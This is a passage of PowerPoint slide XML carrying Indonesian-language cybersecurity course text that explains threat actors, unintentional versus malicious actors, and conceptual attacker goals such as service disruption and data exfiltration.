              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>milis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terstruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>oportunistik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>motivasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikontraskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disengaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disengaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disengaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mewakili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecelakaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kekeliruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menganalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>motivasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertama-tama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan-mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memblokir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server dan workstation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>motivasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menabur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kekacauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membalas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dendam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>taktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>strategis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Eksfiltrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memindahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>salinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berharga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencurian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginginkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
